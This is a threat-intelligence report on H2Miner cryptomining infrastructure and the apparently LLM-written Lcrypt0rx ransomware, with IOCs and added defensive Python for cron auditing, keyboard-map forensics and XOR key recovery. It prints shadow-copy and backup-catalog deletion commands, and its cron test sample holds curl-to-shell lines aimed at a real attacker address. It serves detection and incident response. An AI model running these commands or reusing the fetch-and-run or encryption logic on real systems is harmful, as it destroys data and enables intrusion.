The FortiCNAPP team, part of FortiGuard Labs, recently investigated a cluster of virtual private servers (VPS) used for Monero mining. The identified samples are associated with prior H2Miner campaigns that we documented in 2020 and have since been updated with new configurations. H2Miner is a cryptomining botnet that has been active since late 2019.
Researchers also identified a new variant of the Lcryx ransomware, called Lcrypt0rx. Lcryx is a relatively new VBScript-based ransomware strain first observed in November 2024. This family exhibits several unusual characteristics that suggest it may have been generated using AI.[1]
This is the first documented instance of operational overlap between H2miner and Lcryx, suggesting the following possibilities:
- A collaboration between the operators to maximize financial gain. This makes sense as they both target different operating systems.
- Development of Lcrypt0rx by H2miner operators to increase their campaign’s financial gain.
- Reuse of Lcrypt0rx by H2miner operators to conduct mining operations while shifting the blame.
Adversary Infrastructure & Tool Details
The infrastructure hosts a diverse set of samples, including several commercial tools that target multiple operating systems to maximize financial gain from a victim's environment.
| Tool | Linux | Windows | Containers |
|---|---|---|---|
| KinSing | ✔️ | | |
| Xmrig miners | ✔️ | ✔️ | ✔️ |
| Lcrypt0rx | | ✔️ | |
| Lumma stealer | | ✔️ | |
| DCRat | | ✔️ | |
| Cobalt Strike | | ✔️ | |
| Amadey | | ✔️ | |
| RustyStealer | | ✔️ | |
| ScreenConnect | | ✔️ | |
The infrastructure uses multiple VPS providers for hosting and Command & Control.
| Host | Role |
|---|---|
| 78[.]153[.]140[.]66 | HostGlobal plus VPS |
| 80[.]64[.]16[.]241 | LIR limited ISP |
| 89[.]208[.]104[.]175 | Aeza international VPS |
| 47[.]97[.]113[.]36 | Cobalt Strike server hosted by Hangzhou Alibaba Advertising Co. ISP |
| Bitbucket[.]org | Used to host a payload in the repository sadsafsadfsadf/dsfgdsgssdfgdsg |
| 176[.]65[.]137[.]203 | Dolphin host VPS |
| 185[.]156[.]72[.]96 | Amadey C2 server hosted by TOV VAIZ PARTNER ISP |
| 80[.]64[.]18[.]161 | Stimul LLC |
| 207[.]231[.]109[.]252 | HostRush VPS |
| s10[.]krakenfiles[.]com | File hosting used to download Lcrypt0rx's wallpaper, uploaded on 30-04-2025 |
| 104[.]21[.]32[.]1 / softwareshop[.]win | Metasploit C2 |
The Curious Case of Lcryx Ransomware
Analysts suspect the Lcryx family was generated using AI based on the following indicators:
- Function Duplication – Multiple functions are repeated throughout the script with no clear reason, suggesting automated code generation without optimization.
- Incorrect Persistence Mechanisms – Attempts to establish persistence via WinLogon and Image File Execution Options (IFEO) are improperly implemented.
- Flawed Encryption Logic – The encryption routine uses OpenTextFile to locate target files while skipping executables, DLLs, and system files by catching errors and exiting. However, it opens each file at the beginning of the routine while verifying headers without handling errors properly. A global On Error Resume Next statement is used to bypass exceptions, allowing execution to continue unchecked.
- Redundant Object Creation – Multiple unnecessary calls to CreateObject("Wscript.Shell") are made throughout the script, with repeated reinitialization.
- Malformed Syntax – The code includes syntax errors and malformed lines, such as WshShell.RegWriteWshShell.RegWrite and SubSet, reflecting automated generation or a lack of validation.
- Illogical Behaviors – The script attempts to open encrypted files in Notepad, which has no practical function and makes no operational sense.
- Nonexistent Target Paths – Some folders targeted for encryption are not present across common Windows versions, indicating a lack of contextual awareness in environment targeting.
- Invalid Ransom Note URL – The .onion address in the ransom note (http://lcryptordecrypt7xfzq5tclm9jzpwq72uofgy2znkdsxm54zbcu2yid[.]onion) does not conform to valid TOR address specifications. It may have been a placeholder during a transition from v2 to v3 onion services.
- Ineffective AV Disabling – The methods used to disable Bitdefender and Kaspersky antivirus products are incorrect.
- AI Detection Results – To validate initial suspicions prompted by repeated code errors, we ran the script through two tools: AI Code Detector (IH EH), which specializes in identifying code written by ChatGPT, and ZeroGPT, a general-purpose AI content detector. Both flagged the code as likely AI-generated, with confidence scores in the 85–90% range. These findings align with the observable issues throughout the script.
This fits the growing adoption of large language models (LLMs) by threat actors in recent years. Combined with the widespread availability of commercial tools, this trend has significantly lowered the barrier to entry for cybercriminal activity.
Below, Fortinet will examine some interesting aspects of the identified samples.
H2Miner Sample Analysis
H2Miner continues to rely heavily on scripts to disable defenses and expand access, ultimately enabling the deployment of miners. Many of these scripts resemble previously documented variants; however, this version has been updated with new deployment URLs.
Script Name: ce.sh
MD5 Hash: 1bf1efeadedf52c0ed50941b10a2f468
This script includes code blocks that are structurally similar to earlier H2Miner samples used to terminate security software. However, this variant goes further by also targeting database and user application processes. Additionally, it deploys Kinsing malware, establishes persistence by registering itself as a service, and attempts to eliminate competing miners by terminating related processes and clearing associated cron entries.
Figure 1: Process Stop
Figure 2: Clearing cron
The script then checks for an existing cron entry that downloads and executes itself from 80[.]64[.]16[.]241, and adds the entry if it’s missing. Finally, it clears both the current and persistent shell command history to cover its tracks.
Figure 3: Cron entry and clearing command history
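The cron check described above is something a defender can audit for directly. The following is an added Python example, not code from the report or from the H2Miner scripts: it scans crontab lines for a remote script piped straight into a shell and for fetches from the addresses in the report's IOC list. The crontab excerpt is constructed, and the URL paths in it are assumed; only the address and script names come from the report.

```python
import re

# Constructed crontab excerpt (not taken from the samples). The address is the
# one the report names for ce.sh; the URL paths are assumed for illustration.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * /usr/lib/sysstat/sa1 1 1
* * * * * curl -fsSL http://80.64.16.241/ce.sh | sh
*/10 * * * * wget -q -O- http://80.64.16.241/cpr.sh | bash >/dev/null 2>&1
0 1 * * * /opt/backup/run.sh
"""

# Addresses from the report's IOC list.
KNOWN_C2_IPS = {
    "78.153.140.66", "80.64.16.241", "89.208.104.175", "47.97.113.36",
    "176.65.137.203", "185.156.72.96", "80.64.18.161", "207.231.109.252",
    "104.21.32.1",
}

DOWNLOADER = re.compile(r"\b(?:curl|wget)\b")
# A pipe into sh/bash/dash/zsh, optionally with an absolute path.
PIPE_TO_SHELL = re.compile(r"\|\s*(?:/bin/|/usr/bin/)?(?:ba|da|z)?sh\b")
# A URL whose host is a bare IPv4 literal; the capture group is the address.
IP_URL = re.compile(r"https?://(\d{1,3}(?:\.\d{1,3}){3})")


def audit_crontab(text, known_c2=KNOWN_C2_IPS):
    """Return one finding per suspicious crontab entry, with the reasons it was flagged.
    Comments and blank lines are skipped; everything else is treated as an entry."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        reasons = []
        if DOWNLOADER.search(line) and PIPE_TO_SHELL.search(line):
            reasons.append("remote script piped straight into a shell")
        for ip in IP_URL.findall(line):
            if ip in known_c2:
                reasons.append(f"fetches from known H2Miner infrastructure {ip}")
            else:
                reasons.append(f"fetches from a bare IP address {ip}")
        if reasons:
            findings.append({"line": lineno, "entry": line, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in audit_crontab(SAMPLE_CRONTAB):
        print(f"line {finding['line']}: {finding['entry']}")
        for reason in finding["reasons"]:
            print(f"    - {reason}")
```

Running it over the system crontab, /etc/cron.d and each user's crontab -l output gives a quick first pass; the bare-IP rule is deliberately broad because a legitimate cron job rarely fetches and executes a script from an unnamed host.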
Script Name: spr.sh
MD5 Hash: a7bee104bb486ad0f10331233cc9a9f1
This script closely resembles earlier H2Miner scripts used to terminate processes and deploy Kinsing malware, but it includes updated URLs. Notably, the script targets the Alibaba Cloud Security Center agent as well as processes and container images running within Docker, indicating an awareness of cloud-specific defenses and containerized environments.
Figure 5: Killing miners and removing miner images
Script Name: cpr.sh
MD5 Hash: 0dc2c71ce9c6c34668e9636abf61b1ae
This script functions as a Kinsing updater. It removes any existing Kinsing installation and redeploys it by downloading and executing a shell script similar in structure to ce.sh.
Several additional scripts identified during this investigation reuse code blocks from ce.sh, spr.sh, and cpr.sh. While their specific logic may vary, their ultimate purpose remains consistent: deploying Kinsing, a remote access trojan (RAT) commonly used to deliver crypto miners in compromised environments.
| Name | MD5 | Description |
|---|---|---|
| curl-amd64 | dbc9125192bd1994cbb764f577ba5dda | Kinsing RAT linked to 2021 Log4j (CVE-2021-44228) campaigns |
| kinsing | b3039abf2ad5202f4a9363b418002351 | Kinsing RAT linked to Openfire (CVE-2023-32315) attacks in 2023 |
| kinsing_aarch64 | da753ebcfe793614129fc11890acedbc | Kinsing sample used in Apache ActiveMQ (CVE-2023-46604) attacks in 2023 |
| libsystem.so | ccef46c7edf9131ccffc47bd69eb743b | Kinsing rootkit observed in the wild in late 2020 |
Script Name: 1.ps1
MD5 Hash: 01e5b2530d4cba34f91c8090d19c92db
This PowerShell script downloads an XMRig Monero miner from 78[.]153[.]140[.]66 and saves it to the system’s temporary directory as sysupdate. It then creates a scheduled task using schtasks with the name "Update service for Windows Service" to ensure persistence. The script’s structure closely resembles those used in early 2021 mining campaigns and appears to have been reused for current operations. Notably, this XMRig miner is also deployed by the Lcrypt0rx ransomware variant.
The associated configuration file (ff1706b37fea16d75b739a5396d9ffba) points to the Monero wallet:
4ASk4RhUyLL7sxE9cPyBiXb82ofekJg2SKiv4MKtCbzwHHLQxVVfVr4D4xhQHyyMTieSM5VUFGR9jZVR5gp6sa1Q2p8SahC
This wallet has been previously linked to H2Miner campaigns dating back to late 2021, indicating continuity or overlap in its operators.
Figure 6: Excerpt from config
This usage of older scripts and samples with updated configurations and hosting URLs points to a resurgence of older campaigns from 2020 and 2021.
Lcrypt0rx Sample Analysis
Script Name: Lcrypt0rx.vbs
MD5 Hash: 06a482a6096e8ff4499ae69a9c150e92
Variants: f5f2b61b39105a2b1e6e1a5f4a3863ae, 9f764ec91535eaf03983b930d9f3bacd
Behavior Summary
Analysis of this sample shows that it proceeds through the following steps:
Privilege Escalation:
Lcrypt0rx first checks if it is running with administrator privileges. If not, it relaunches itself with elevated rights using Shell.Application to invoke wscript.exe with the /elevated flag.
Figure 7: Relaunch with elevated privileges
System Modifications:
Once elevated, the script disables a range of system utilities and user protections by modifying the Windows Registry. These include:
- Task Manager (taskmgr.exe)
- Registry Editor (regedit.exe)
- Control Panel
- Run dialog
- UAC prompts
- Admin elevation prompts
- User input inactivity lockouts
It also disables the execution of several critical tools:
- System Configuration Utility (msconfig.exe)
- Autoruns
- Group Policy Editor (gpedit.msc)
- Process Explorer
- System Settings Utility
Figure 8: Registry modifications
Persistence Attempt:
Lcrypt0rx then attempts to establish persistence by adding its full path to the Winlogon Shell registry key and registering itself as an Image File Execution Options (IFEO) debugger for cmd.exe. However, these attempts fail because the script path is added without prepending wscript.exe, rendering the entries non-functional.
Figure 9: Incorrect persistence
System Interference:
Using WMI, the script then forcibly terminates taskmgr.exe, msconfig.exe, and regedit.exe. It also modifies the Scancode Map registry value to disable a wide range of keys, including:
- Modifier keys (Ctrl, Shift, Alt, Windows)
- Function keys (F1, F2, F3, F10)
- System keys (Delete)
- Common letters (C, M, D, T, A, S, K, N, G, E, R, I)
Mouse buttons are also reversed, and all changes are applied immediately to disrupt user control.
| From (Hex) | From (Key) | To (Hex) | To (Key) | Notes |
|---|---|---|---|---|
| E05B | Left Windows | 0000 | Disabled | Disable Left Win |
| E05C | Right Windows | 0000 | Disabled | Disable Right Win |
| 001D | Left Ctrl | 0000 | Disabled | Disable Left Ctrl |
| E01D | Right Ctrl | 0000 | Disabled | Disable Right Ctrl |
| 002A | Left Shift | 0000 | Disabled | Disable Left Shift |
| 0036 | Right Shift | 0000 | Disabled | Disable Right Shift |
| 0038 | Left Alt | 0000 | Disabled | Disable Left Alt |
| E038 | Right Alt (AltGr) | 0000 | Disabled | Disable Right Alt |
| 003B | F1 | 0000 | Disabled | Disable F1 |
| E053 | Delete (Ext) | 0000 | Disabled | Disable Delete |
| E000 | Null? (invalid) | 0000 | Disabled | Malformed entry? |
| 003C | F2 | 0000 | Disabled | Disable F2 |
| 003D | F3 | 0000 | Disabled | Disable F3 |
| 002E | C | 0000 | Disabled | Disable C |
| 0032 | M | 0000 | Disabled | Disable M |
| 0020 | D | 0000 | Disabled | Disable D |
| 0014 | T | 0000 | Disabled | Disable T |
| 001E | A | 0000 | Disabled | Disable A |
| 001F | S | 0000 | Disabled | Disable S |
| 0025 | K | 0000 | Disabled | Disable K |
| 0031 | N | 0000 | Disabled | Disable N |
| 0022 | G | 0000 | Disabled | Disable G |
| 0012 | E | 0000 | Disabled | Disable E |
| 0013 | R | 0000 | Disabled | Disable R |
| 0017 | I | 0000 | Disabled | Disable I |
| 0044 | F10 | 0000 | Disabled | Disable F10 |
Figure 10: System control hampering
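The table above is exactly what an incident responder would want to reconstruct from the registry during triage. The following is an added Python example, not code from the report or the malware: a parser for the REG_BINARY layout of HKLM\SYSTEM\CurrentControlSet\Control\Keyboard Layout\Scancode Map (two zero header DWORDs, an entry count including the terminator, one DWORD per mapping with the target code in the low word and the original code in the high word, then a zero terminator), plus a tamper heuristic. The sample value is constructed from the first rows of the table; the threshold used to call a value suspicious is an assumption of this example, not a finding of the report.

```python
import struct

# Labels for the scan codes in the table above (set-1 codes). 0x003A (Caps Lock)
# is added only for the benign-remap comparison below.
SCANCODE_NAMES = {
    0xE05B: "Left Windows", 0xE05C: "Right Windows", 0x001D: "Left Ctrl",
    0xE01D: "Right Ctrl", 0x002A: "Left Shift", 0x0036: "Right Shift",
    0x0038: "Left Alt", 0xE038: "Right Alt (AltGr)", 0x003B: "F1", 0x003C: "F2",
    0x003D: "F3", 0x0044: "F10", 0xE053: "Delete (Ext)", 0x002E: "C",
    0x0032: "M", 0x0020: "D", 0x0014: "T", 0x001E: "A", 0x001F: "S",
    0x0025: "K", 0x0031: "N", 0x0022: "G", 0x0012: "E", 0x0013: "R",
    0x0017: "I", 0x003A: "Caps Lock",
}
MODIFIER_KEYS = {0xE05B, 0xE05C, 0x001D, 0xE01D, 0x002A, 0x0036, 0x0038, 0xE038}
TERMINATOR = b"\x00\x00\x00\x00"


def build_scancode_map(mappings):
    """Encode (original, target) pairs in the Scancode Map REG_BINARY layout:
    version DWORD, flags DWORD, count DWORD (entries + terminator), one DWORD
    per entry (low word = target code, high word = original code), terminator."""
    body = b"".join(struct.pack("<HH", target, original) for original, target in mappings)
    return struct.pack("<III", 0, 0, len(mappings) + 1) + body + TERMINATOR


def parse_scancode_map(blob):
    """Decode a Scancode Map value into (original, target) pairs, validating the layout."""
    if len(blob) < 16 or len(blob) % 4:
        raise ValueError("Scancode Map must be at least 16 bytes and DWORD-aligned")
    _version, _flags, count = struct.unpack_from("<III", blob, 0)
    if 12 + 4 * count != len(blob):
        raise ValueError(f"entry count {count} does not match value length {len(blob)}")
    if blob[-4:] != TERMINATOR:
        raise ValueError("missing all-zero terminator entry")
    mappings = []
    for i in range(count - 1):
        target, original = struct.unpack_from("<HH", blob, 12 + 4 * i)
        mappings.append((original, target))
    return mappings


def assess_scancode_map(blob):
    """Summarise what the value does and flag the pattern seen in Lcrypt0rx.
    Heuristic (this example's assumption): a legitimate remap touches one or two
    keys, so any disabled modifier key, or three or more keys mapped to 0x0000,
    is reported as tampering."""
    mappings = parse_scancode_map(blob)
    disabled = [original for original, target in mappings if target == 0]
    findings = []
    for original, target in mappings:
        name = SCANCODE_NAMES.get(original, f"0x{original:04X}")
        if target == 0:
            findings.append(f"{name} (0x{original:04X}) disabled")
        else:
            target_name = SCANCODE_NAMES.get(target, f"0x{target:04X}")
            findings.append(f"{name} (0x{original:04X}) remapped to {target_name}")
    suspicious = len(disabled) >= 3 or any(key in MODIFIER_KEYS for key in disabled)
    return {"mappings": mappings, "disabled": disabled,
            "suspicious": suspicious, "findings": findings}


if __name__ == "__main__":
    # Constructed value reproducing the first rows of the table above.
    sample = build_scancode_map([(0xE05B, 0), (0x001D, 0), (0x002E, 0)])
    result = assess_scancode_map(sample)
    print("suspicious:", result["suspicious"])
    for line in result["findings"]:
        print("  " + line)
```

On a live host the value can be exported with reg.exe or read with winreg and passed to assess_scancode_map as-is; a Caps Lock to Ctrl remap, the most common legitimate use of this key, parses as a single non-zero target and is not flagged.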
Attribute Manipulation & Destruction
Next, the script marks itself as read-only, hidden, and system-protected, and proceeds to overwrite the Master Boot Record (MBR), a destructive move that renders the system unbootable.
Figure 11: Attribute manipulation and MBR overwrite
Defense Evasion
Lcrypt0rx then attempts to disable Windows Defender real-time protection, BitDefender, and Kaspersky. However, the methods used for BitDefender and Kaspersky are ineffective, likely artifacts of LLM hallucinations. The firewall is disabled via netsh.
Figure 12: Impair Defenses
Encryption Key Generation and File Selection
An 8,192-character master key is then generated using ASCII values 1–255, and a per-file salt of equal length is appended to it during the encryption process. This key-salt pair is used to XOR-encode each file’s content.
Folders selected for encryption include standard directories and OneDrive backups. System recovery is disrupted by:
cmd.exe /c vssadmin delete shadows /all /quiet
cmd.exe /c wbadmin delete catalog -quiet
Ransom Note Deployment
Next, a ransom note is dropped in multiple locations (Desktop, Documents, Pictures, Videos, Downloads, Music) and opened in Notepad. The message demands $1,000 (up from $500 in earlier samples) and shortens the payment deadline from 5 to 3 days. The .onion URL in the note is syntactically invalid and does not match the one shown in the desktop wallpaper, which uses an obsolete v2 TOR address, suggesting a placeholder or reuse by H2Miner actors.
Visual Defacement
An image from https://s10[.]krakenfiles[.]com/uploads/30-04-2025/605q6HLKTv/image[.]jpg is then downloaded and set as the desktop background by editing the HKCU\Control Panel\Desktop\Wallpaper registry key.
The TOR address in the image aligns with older Lcryx variants.
Figure 15: Downloading and setting the wallpaper
Figure 16: Wallpaper defacement
Backup Persistence
Lcrypt0rx then establishes fallback persistence by dropping and registering multiple embedded scripts via run keys. This time, persistence works correctly, with the scripts executed using wscript.exe and marked as read-only, system-protected, and hidden.
A summary of the scripts is listed below:
| Full path | Description |
|---|---|
| C:\Windows\SysWOW64\msvcr80.dll.bat | Pings ragebot[.]fun, a game cheat developer site. |
| C:\Windows\System32\systemconfig.exe.vbs | Denial-of-service script that floods the gateway of the system's network interface and ragebot[.]fun with 45 MB HTTP POSTs. |
| C:\Windows\advapi32_ext.vbs | Uses taskkill in an infinite loop to kill targeted processes, including popular AV processes such as Avast, Windows Defender, Kaspersky, AVG, Norton, Protegent360, AvGuard, and McAfee McShield. |
| C:\Windows\System32\USB_bridge.vbs | Monitors for any newly connected drive and copies itself over. Likely a prototype script. |
| C:\Windows\CDConnector.vbs | Monitors for any connected CD drive and attempts to eject it. |
| C:\Windows\System32\slmgr.bat.vbs | Launches itself with the window hidden and continuously displays a message box demanding ransom payment. It also resets the system time to 00:00, likely in an attempt to confuse system logs. |
Network Blocking & Shell Restriction
The script then modifies the hosts file to block AV-related domains and disables cmd.exe for the current user by setting:
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\System\DisableCMD
Figure 17: Hosts file modification
Lcrypt0rx then downloads and executes miners and infostealers before finally entering the encryption routine. This section is not seen in older Lcryx samples.
The details about the executables are listed below.
| URL | MD5 | Description |
|---|---|---|
| http://89[.]208[.]104[.]175:5002/ime3[.]exe | 9e4f149dae1891f1d22a2cea4f68432e | A Trojan with fake Google resources, used primarily to disable defenses and mine Monero. It modifies the hosts file to block popular AV sites, adds Defender exclusions via PowerShell, removes the MSRT update via wusa.exe, disables Windows updates via sc.exe, creates service persistence for itself, and escalates privileges via a bring-your-own-vulnerable-driver (BYOVD) technique using the vulnerable WinRing0.sys driver. |
| http://89[.]208[.]104[.]175:5002/piperpate[.]exe | a729410de4dc397d1fb2ab8f7ae560d3 | Lumma stealer. C2s: disciplipna[.]top/eqwu, praetori[.]live/vepr, opusculy[.]top/keaj, scriptao[.]digital/vpep, civitasu[.]run/werrp, exitiumt[.]digital/xane, viriatoe[.]live/laopx, brandihx[.]run/lowp, triremeo[.]digital/akds |
| https://bitbucket[.]org/sadsafsadfsadf/dsfgdsgssdfgdsg/downloads/MicrosoftSoftware[.]exe | 2726145d4ef3b34d3c3a566177805c39 | Injector that checks for a debugger and then injects DCRat. |
| http://47[.]97[.]113[.]36:10010/02[.]08[.]2022[.]exe | 1aee8a425ea53c571a16b8efde05ba01 | Cobalt Strike. C2: 47[.]97[.]113[.]36 |
| http://176[.]65[.]137[.]203/music-play[.]exe | B6cd214bb814362694cc48299ebaf0e5 | A Trojan that drops .bat files that execute XMRig miners from the temp directory. The IP range also hosts a Metasploit reverse shell for Windows and Linux with C2 callbacks to 176[.]65[.]138[.]172 and softwareshop[.]win, as well as web shells. |
| http://185[.]156[.]72[.]121/test/exe/random[.]exe | 0680df49e1866c86697028ea73d28d28 | Amadey infostealer. C2: 185[.]156[.]72[.]96/te4h2nus/index.php; mutex: 006700e5a2ab05704bbb0c589b88924d; encryption_key: NGEyYjFkNzk0ZTc5YTQ1MzJiNmUyYjY3OTQwOGQyYmI= |
| http://80[.]64[.]18[.]161/files/6051142952/8QivM1I[.]exe | d3884cc519c6855ae20d64264d5f6e93 | RustyStealer. It also executes multiple PowerShell commands that add Defender folder exclusions for users\<username> and appdata\local\packages and create RunOnce and scheduled-task persistence for itself. These scripts contain minor syntax errors. |
| http://78[.]153[.]140[.]66/xmrig[.]exe | 57f0fdec4d919db0bd4576dc84aec752 | Same XMRig miner that was downloaded by the H2Miner script 1.ps1; 6868c280c61c0b1e2ab8bf6792f1eef2 |
| https://207[.]231[.]109[.]252/bin/support[.]client[.]exe | 44143827116c96f5dcace4f95dff8697 | ConnectWise ScreenConnect. |
Monero Wallets
The config used for Monero mining points to the following wallets for mining payouts:
89UoMhtsrpaJTvmJBbvy1cTdg38pomPFnW5Z4sniL2izcLQyGBkEGd96TcBJtzQUi6KAL5Ehe4cFpEMNdGF7tFKpJ1DqE8X
89Arz88KTafhoTPAseYf2bfcWSjNq1YLaVY7ZkFaU21FivDueX4d7X7UErnyjAWHsVB1mibdTGHzqUTsS5FCMog89GVcQCh
4ASk4RhUyLL7sxE9cPyBiXb82ofekJg2SKiv4MKtCbzwHHLQxVVfVr4D4xhQHyyMTieSM5VUFGR9jZVR5gp6sa1Q2p8SahC
This is the same wallet observed in previous H2Miner campaigns.
Figure 18: Encryption logic and XOR implementation
File Encryption and Data Disruption
Lcrypt0rx now enters a persistent loop that continuously scans the previously enumerated directories and any attached storage volumes for new files to encrypt. Each file is processed through an encryption routine with multiple checks and conditions.
The routine begins by attempting to open the file using the OpenTextFile method in VBScript. This fails for executables, DLLs, and other system-critical formats, which are excluded by default through error handling. Before proceeding, the script verifies whether the file:
- Already contains a custom Lcrypt0rx header, indicating it has been encrypted previously
- Matches the name of one of the embedded scripts dropped earlier in the infection chain
Files that match neither condition are queued for encryption.
Figure 19: Encryption header and file skips.
To encrypt each file, Lcrypt0rx generates a unique 8,192-character salt composed of ASCII characters (codes 1–255), which it appends to a pre-generated master key. This is a notable change from earlier Lcryx variants, where the salt length was only 32 characters.
The script then XORs each character of the file content with the corresponding character from the combined key-salt pair, producing the obfuscated output. The resulting data is saved to a new file with the .lcryx extension, and the original file is deleted to complete the encryption process.
As a final step, Lcrypt0rx checks all targeted folders for files associated with backups. Any files with recognized backup-related extensions are deleted to further prevent recovery.
Despite these actions, the ransomware does not transmit or store the encryption keys locally or remotely. Combined with the use of simple XOR encryption, this makes recovery trivial through basic cryptanalysis. The lack of key management, combined with the presence of scare tactics and superficial ransom demands, suggests that Lcrypt0rx operates more as scareware than a serious ransomware threat.
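The claim that recovery is trivial follows directly from the construction described above: every file's keystream starts with the same master key, so one file for which a clean copy exists (a backup, an installer, a public document) reveals that key for all of them. The following is an added Python example, not the report's or the malware's code, that models the routine as described (a master key and a per-file salt of 8,192 values in the range 1–255, concatenated and XORed byte by byte) and then performs the known-plaintext recovery a responder would attempt. Assumptions of this example: the XOR is byte-wise, the keystream index wraps modulo its length for files longer than the keystream (the report does not say how the script handles that case), and the custom header the real script prepends is omitted because its value is not given.

```python
import random

KEY_LEN = 8192  # length of the master key and of each per-file salt, per the report


def random_key(seed, length=KEY_LEN):
    """Deterministic stand-in for the script's key generator: values 1..255 only,
    matching the report's "ASCII values 1-255". Seeded so the example is repeatable."""
    rng = random.Random(seed)
    return bytes(rng.choices(range(1, 256), k=length))


def xor_keystream(data, keystream):
    """XOR every byte of data with the keystream byte at the same offset.
    Assumption: the index wraps modulo the keystream length for longer data."""
    n = len(keystream)
    return bytes(b ^ keystream[i % n] for i, b in enumerate(data))


def model_encrypt(plaintext, master_key, salt):
    """Model of the routine: keystream = master key followed by the per-file salt.
    XOR is its own inverse, so the same call with the same keystream decrypts."""
    return xor_keystream(plaintext, master_key + salt)


def recover_master_key(known_plaintext, ciphertext, key_len=KEY_LEN):
    """Known-plaintext recovery: p XOR c gives the keystream, and the first key_len
    bytes of every file's keystream are the master key shared by all files."""
    if min(len(known_plaintext), len(ciphertext)) < key_len:
        raise ValueError(f"need at least {key_len} bytes of known plaintext")
    return bytes(p ^ c for p, c in zip(known_plaintext[:key_len], ciphertext[:key_len]))


def decrypt_with_master(ciphertext, master_key, salt_len=KEY_LEN):
    """Undo the master-key part of the keystream. Offsets covered by the unstored
    per-file salt are left as ciphertext and counted, so files up to len(master_key)
    bytes come back whole and longer files come back with gaps."""
    period = len(master_key) + salt_len
    out = bytearray(ciphertext)
    unrecovered = 0
    for i, c in enumerate(ciphertext):
        pos = i % period
        if pos < len(master_key):
            out[i] = c ^ master_key[pos]
        else:
            unrecovered += 1
    return bytes(out), unrecovered


if __name__ == "__main__":
    # Constructed scenario: one file with a known clean copy, one without.
    master, salt_a, salt_b = random_key(1), random_key(2), random_key(3)
    known_file = bytes(range(256)) * 40          # 10,240 bytes, clean copy available
    victim_file = b"quarterly figures\n" * 30    # 540 bytes, no clean copy
    recovered_key = recover_master_key(known_file, model_encrypt(known_file, master, salt_a))
    plaintext, gaps = decrypt_with_master(model_encrypt(victim_file, master, salt_b), recovered_key)
    print(recovered_key == master, plaintext == victim_file, gaps)  # → True True 0
```

The limit of this recovery is also visible in the model: bytes at offsets 8,192–16,383 of a longer file were XORed with that file's own salt, which is never stored, so those bytes need a second known-plaintext source (for example, predictable file-format structure) rather than the shared master key.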
Conclusion
The H2Miner threat actors have remained active and adaptable since first emerging in late 2019. Their recent campaigns continue to rely on a blend of reused, proven tooling and newly integrated elements, including the curious addition of Lcrypt0rx ransomware.
While Lcrypt0rx lacks the sophistication of more advanced ransomware families, it introduces distinct techniques for degrading system usability, UI interference, and redundant embedded scripts. It also bundles commercially available hack tools and infostealers, expanding its functionality beyond simple encryption.
Ultimately, both the H2Miner and Lcrypt0rx chains converge on the deployment of Monero miners, a hallmark of resource hijacking campaigns. In cloud environments, this results in significant financial impact, as compromised systems incur elevated compute costs, degraded performance, and increased operational risk.
The campaign reflects a broader trend: the commodification of cybercrime, where access to prebuilt tools, LLM-generated code, and cheap infrastructure lowers the barrier to entry, enabling even low-skill actors to launch high-impact campaigns.
IOCs
IPs
78[.]153[.]140[.]66
80[.]64[.]16[.]241
89[.]208[.]104[.]175
47[.]97[.]113[.]36
176[.]65[.]137[.]203
185[.]156[.]72[.]96
80[.]64[.]18[.]161
207[.]231[.]109[.]252
104[.]21[.]32[.]1
Files
ff1706b37fea16d75b739a5396d9ffba
9e4f149dae1891f1d22a2cea4f68432e
a729410de4dc397d1fb2ab8f7ae560d3
2726145d4ef3b34d3c3a566177805c39
1aee8a425ea53c571a16b8efde05ba01
B6cd214bb814362694cc48299ebaf0e5
0680df49e1866c86697028ea73d28d28
d3884cc519c6855ae20d64264d5f6e93
57f0fdec4d919db0bd4576dc84aec752
44143827116c96f5dcace4f95dff8697
Scripts
1bf1efeadedf52c0ed50941b10a2f468
a7bee104bb486ad0f10331233cc9a9f1
0dc2c71ce9c6c34668e9636abf61b1ae
01e5b2530d4cba34f91c8090d19c92db
Kinsing
dbc9125192bd1994cbb764f577ba5dda
b3039abf2ad5202f4a9363b418002351
da753ebcfe793614129fc11890acedbc
ccef46c7edf9131ccffc47bd69eb743b
Lcrypt0rx
06a482a6096e8ff4499ae69a9c150e92
f5f2b61b39105a2b1e6e1a5f4a3863ae
9f764ec91535eaf03983b930d9f3bacd
Wallet
4ASk4RhUyLL7sxE9cPyBiXb82ofekJg2SKiv4MKtCbzwHHLQxVVfVr4D4xhQHyyMTieSM5VUFGR9jZVR5gp6sa1Q2p8SahC
89UoMhtsrpaJTvmJBbvy1cTdg38pomPFnW5Z4sniL2izcLQyGBkEGd96TcBJtzQUi6KAL5Ehe4cFpEMNdGF7tFKpJ1DqE8X
89Arz88KTafhoTPAseYf2bfcWSjNq1YLaVY7ZkFaU21FivDueX4d7X7UErnyjAWHsVB1mibdTGHzqUTsS5FCMog89GVcQCh
This article is shared with permission at no charge for educational and informational purposes only.
Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. We provide indicators of compromise information via a notification service (RedXray) or an analysis service (CTAC). For questions, comments, or assistance, please get in touch with the office directly at 1-844-492-7225 or feedback@redskyalliance.com
- Reporting: https://www.redskyalliance.org/
- Website: https://www.redskyalliance.com/
- LinkedIn: https://www.linkedin.com/company/64265941